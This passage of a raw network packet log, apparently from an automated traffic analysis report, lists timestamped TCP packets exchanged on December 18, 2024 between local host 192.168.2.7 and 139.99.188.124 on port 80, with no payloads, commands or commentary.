                                                                                        Dec 18, 2024 20:55:43.803946972 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.804033995 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.808063030 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.808227062 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.808283091 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.812520981 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.812666893 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.812930107 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.816736937 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.816924095 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.816981077 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.821110964 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.821381092 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.821441889 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.825479984 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.825651884 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.825819016 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.829814911 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.830140114 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.830238104 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.834158897 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.834357023 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.834417105 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.838558912 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.838738918 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.838819981 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.842940092 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.843426943 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.843482971 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.847722054 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.847729921 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.847786903 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.851737976 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.925901890 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.925910950 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.926064968 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.927861929 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.927973986 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.946564913 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.946907997 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.946996927 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.949147940 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.949383974 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.949392080 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.949454069 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.953175068 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.953191042 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.953352928 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.955611944 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.955626965 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.955766916 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.958906889 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.958914042 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.959037066 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.961503983 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.961510897 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.961570978 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.964570999 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.964579105 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.964644909 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.966712952 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.966816902 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.966890097 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.969846010 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.969938040 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.970002890 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.972771883 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.972862005 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.972976923 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.975868940 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.975912094 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.976027966 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.978751898 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.979018927 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.979058981 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.981787920 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.981851101 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.981973886 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.984602928 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.984700918 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.984786987 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.987497091 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.987545967 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.987673998 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.990412951 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.990468025 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.990598917 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.993479013 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.993585110 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.993705988 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.996273994 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.996365070 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:43.996454954 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.999284029 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.999411106 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:43.999452114 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.002214909 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.002265930 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.002389908 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.005470037 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.005621910 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.006370068 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.008214951 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.008300066 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.008388996 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.011360884 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.011471033 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.011492968 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.013834953 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.013916969 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.014004946 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.016808033 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.016951084 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.016976118 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.019793034 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.019922018 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.019927025 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.022763968 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.022811890 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.022919893 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.025702000 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.025825977 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.025863886 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.028673887 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.028801918 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.028804064 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.031518936 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.031606913 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.031697035 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.034456015 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.034650087 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.034717083 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.037592888 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.037600040 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.037760019 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.040847063 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.040853977 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.041019917 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.043378115 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.043507099 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.043512106 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.046139956 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.046261072 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.046746016 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.049122095 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.049194098 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.049777985 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.052716017 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.052778959 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.052992105 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.055267096 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.055325985 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.055859089 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.058141947 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.058177948 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.058676004 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.060806990 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.060970068 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.060991049 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.063822985 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.064091921 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.064127922 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.066684961 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.066737890 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.066874981 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.069660902 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.069726944 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.069856882 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.072603941 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.072715044 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.072743893 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.075469971 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.075546980 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.075676918 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.078368902 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.078486919 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.078619957 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.081383944 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.081391096 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.081445932 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.084270954 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.084361076 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.084516048 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.087213993 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.087260008 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.087574959 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.090209961 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.090292931 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.090548992 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.093100071 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.093172073 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.093496084 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.096010923 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.096115112 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.118201017 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.118207932 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.118257046 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.119497061 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.119837999 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.119919062 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.122113943 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.122435093 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.122476101 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.124722004 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.138195038 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.138287067 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.138684988 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.139390945 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.139399052 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.139471054 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.141671896 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.141753912 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.161000967 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.161186934 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.161375046 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.161943913 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.162117004 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.162180901 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.164578915 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.164587021 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.164663076 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.165760040 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.165920973 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.165983915 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.167783022 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.167944908 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.167988062 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.169708967 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.169867992 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.169987917 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.171503067 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.171701908 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.171762943 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.173435926 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.173584938 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.173654079 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.175225019 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.175416946 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.175467014 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.177364111 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.177746058 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.177819014 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.178497076 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.178847075 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.178894997 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.179461956 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.179698944 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.179759026 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.180689096 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.180845022 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.181204081 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.181873083 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.182049990 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.182102919 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.183059931 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.183835983 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.183939934 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.185506105 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.185720921 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.185765982 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.653934956 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.654048920 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.662497997 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.783582926 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.783955097 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.783998013 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.784075975 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.784552097 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.784614086 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.785156012 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.785324097 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.785403013 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.786165953 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.786174059 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.786236048 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.787205935 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.787412882 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.787494898 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.788249016 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.788419962 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.788490057 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.789446115 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.789659023 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.789741039 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.790569067 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.790896893 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.790970087 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.791385889 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.791393995 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.791640997 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.792790890 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.793379068 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.793473005 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.795113087 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.795345068 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.795353889 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.795474052 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.795949936 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.795993090 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.796271086 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.796278954 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.796381950 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.797157049 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.797164917 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.797276974 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.797749996 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.798124075 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.798171997 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.798341990 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.799143076 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.799150944 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.799195051 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.800102949 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.800169945 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.800254107 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.801239014 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.801414013 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.801441908 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.802253962 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.802380085 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.802417994 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.803246975 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.803299904 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:44.803669930 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.804403067 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:44.804445028 CET4976680192.168.2.7139.99.188.124
